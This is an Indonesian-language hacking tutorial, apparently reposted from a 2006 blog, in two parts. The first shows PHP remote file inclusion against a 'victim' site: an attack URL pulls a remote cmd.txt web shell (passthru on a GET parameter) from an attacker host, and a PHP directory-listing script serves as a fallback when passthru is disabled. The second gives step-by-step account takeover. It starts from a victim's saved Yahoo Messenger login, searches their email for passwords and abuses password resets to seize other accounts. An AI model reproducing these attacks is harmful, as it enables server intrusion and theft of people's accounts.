sering dipergunakan dalam aksi ‘php injection’ adalah ‘ls -al’ untuk melihat

isi direktori.
Seperti misalnya:

http://www.korban.com/index.php?page=http://www.situsku.com/cmd.txt&?cmd=ls -al

dimana isi dari http://www.situsku.com/cmd.txt adalah

// begin of cmd.txt

<?passthru($_GET[cmd]);?>

// end of cmd.txt

Namun, terkadang aksi itu gagal, tidak menghasilkan apapun atau hanya

menghasilkan error. Salah satu kemungkinan penyebab kegagalan, fungsi dari

passthru di’disable’ oleh sang admin. Tentunya hal ini dilakukan oleh sang

admin dengan alasan keamanan. Tapi kita bisa mengakalinya dengan membuat

script untuk melihat isi direktori.

Berikut script yang penulis modifikasi dari php manual:

// begining of list.txt

<?php

function lookdir($mydirectory) {

$strdir = array();

chdir($mydirectory);

echo “<br><br>Directory of $mydirectory “;

if($handle = opendir($mydirectory)) {

while (false !== ($file = readdir($handle))) {

$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {

// Socket

$info = ’s’;

} elseif (($perms & 0xA000) == 0xA000) {

// Symbolic Link

$info = ‘l’;

} elseif (($perms & 0×8000) == 0×8000) {

// Regular

$info = ‘-’;

} elseif (($perms & 0×6000) == 0×6000) {

// Block special

$info = ‘b’;

} elseif (($perms & 0×4000) == 0×4000) {

// Directory

$info = ‘d’;

if ($file != “.”) {

if ($file != “..”) {

$strdir[] = $mydirectory . $file;//preg_replace(‘//./’,'/’,$file);

}

}

//return $strdir;

} elseif (($perms & 0×2000) == 0×2000) {

// Character special

$info = ‘c’;

} elseif (($perms & 0×1000) == 0×1000) {

// FIFO pipe

$info = ‘p’;

} else {

// Unknown

$info = ‘u’;

}

// Owner

$info .= (($perms & 0×0100) ? ‘r’ : ‘-’);

$info .= (($perms & 0×0080) ? ‘w’ : ‘-’);

$info .= (($perms & 0×0040) ?

(($perms & 0×0800) ? ’s’ : ‘x’ ) :

(($perms & 0×0800) ? ‘S’ : ‘-’));

// Group

$info .= (($perms & 0×0020) ? ‘r’ : ‘-’);

$info .= (($perms & 0×0010) ? ‘w’ : ‘-’);

$info .= (($perms & 0×0008) ?

(($perms & 0×0400) ? ’s’ : ‘x’ ) :

(($perms & 0×0400) ? ‘S’ : ‘-’));

// World

$info .= (($perms & 0×0004) ? ‘r’ : ‘-’);

$info .= (($perms & 0×0002) ? ‘w’ : ‘-’);

$info .= (($perms & 0×0001) ?

(($perms & 0×0200) ? ‘t’ : ‘x’ ) :

(($perms & 0×0200) ? ‘T’ : ‘-’));

$array_file_owner = posix_getpwuid(fileowner($file));

$array_file_group = posix_getgrgid(filegroup($file));

$info .= ” ” . $array_file_owner['name'] . ” “;

$info .= $array_file_group['name'] . ” “;

$info .= filesize($file) . ” “;

$info .= date(“M d Y”,filemtime($file)) . ” “;

$info .= $file;

echo “<br> $info”;

}

closedir($handle);

}

return $strdir;

} // end of function lookdir

$my_working_directory = getcwd();

lookdir($my_working_directory); // atau coba juga lookdir(“.”);

?>

// end of list.txt

Saat kita coba inject dengan menggunakan list.txt, misalnya:

http://www.korban.com/index.php?page=http://www.situsku.com/list.txt

akan menghasilkan isi direktori berikut permissionnya.

Tidak rapih memang, tapi tujuan kita untuk melihat isi direktori bisa

tercapai. Dengan fungsi fread,frwrite kita juga bisa membaca dan

menulis/membuat sebuah file.

Silahkan dikembangkan.

————-[ Takeover Yahoo! Account atau account lainnya ]————-

——————-[ Spyro Kid <spyro_zone@yahoo.com> ]——————-

Artikel ini akan memaparkan kepada anda tentang kecerobohan-kecerobohan

yang sering terjadi dikalangan para netter. Kita akan memanfaatkan beberapa

kebiasaan buruk yang sering kali dilakukan untuk mengambil alih account

mereka tanpa menggunakan tools apapun seperti exploit atau keylogger.

Sebagai contoh adalah penggunaan Yahoo! Messenger dengan kondisi korban

memberi mengaktifkan opsi Remember My ID & Password atau korban lupa

tidak melakukan Sign Out

Permasalahan yang ditemukan adalah

- Bagaimana cara mengetahui karakter dibalik simbol bintang pada form

password?

- Bagaimana cara mendapakan account-account lain yang berhubungan dengan

si korban?

Sebagai ilustrasi, perhatikan screenshot berikut:

http://www.freewebtown.com/spyro_zone/ym_ready.JPG

Yahoo ID dan Password sudah di depan mata. Tapi passwordnya tertutup

karakter bintang. Menyalin passwordnya ke Text Editor tidak dapat dilakukan

karena Form Password tidak mengizinkan aksi tersebut. Lalu bagaimana?

Berikut langkah-langkah yang sebaiknya anda lakukan (atau SEBAIKNYA

TIDAK ANDA LAKUKAN):

- Sign In saja dengan ID dan Password yang telah terisi itu.

- Setelah berhasil klik tab Over View yang dimiliki YM lalu klik 2x

pada sub menu Yahoo Mail.

http://www.freewebtown.com/spyro_zone/oview1.bmp

http://www.freewebtown.com/spyro_zone/oview2.bmp

Akan muncul kotak Popup konfirmasi yang menanyakan apakah anda ingin

otomatis Login ke Yahoo Mail. Klik Yes & Yes pada kotak konfirmasi kedua.

Nah kini Yahoo Mail Korban juga terbuka di hadapan anda dengan indahnya.

Jangan keburu senang dulu, jelajahi inbox korban. Cari info-info menarik.

Ketik keyword Account atau Password pada form search mail. Jika anda

beruntung, maka email yang berisi informasi Account lain sang korban akan

ditampilkan. Jelajahi email-email sensitif tersebut. Jika anda menemukan

sebuah email yang berisi Username dan Password, catat passwordnya. Biasanya

user malas akan memakai password yang sama untuk setiap accountnya. Dan kini

semua account korban sudah jadi milik anda.

Anda tidak menemukan email berisi Username dan Password? Jelajahi email

korban. Apakah dia bergabung dengan newsgroup, forum atau situs tertentu.

Misalnya anda menemukan bahwa korban adalah angota Friendster. Segera arahkan

Browser anda menuju situs Friendster lalu pilih opsi Forgot Password dan

isikan alamat email korban di
sana. Tunggu beberapa saat dan Friendster akan

mengirimkan password si korban kepada anda. Dan kini, sperti yang saya katakan

tadi bahwa biasanya user malas akan memakai password yang sama untuk semua

accountnya. Maka (hehehe.. lagi-lagi saya katakan) anda telah memiliki kuasa

penuh atas (hampir) semua accountnya.

Hal seperti diatas juga dapat anda terapkan ketika si korban lupa melakukan

sign out. Sangat mudah bukan, dan hasilnya cukup luar biasa. Bisakah anda

bayangkan jika si korban memiliki account paypal? Atau mungkin si korban

adalah webmaster suatu situs?

sumber :http://codeattack.wordpress.com/2006/07/20/tips-php-injection/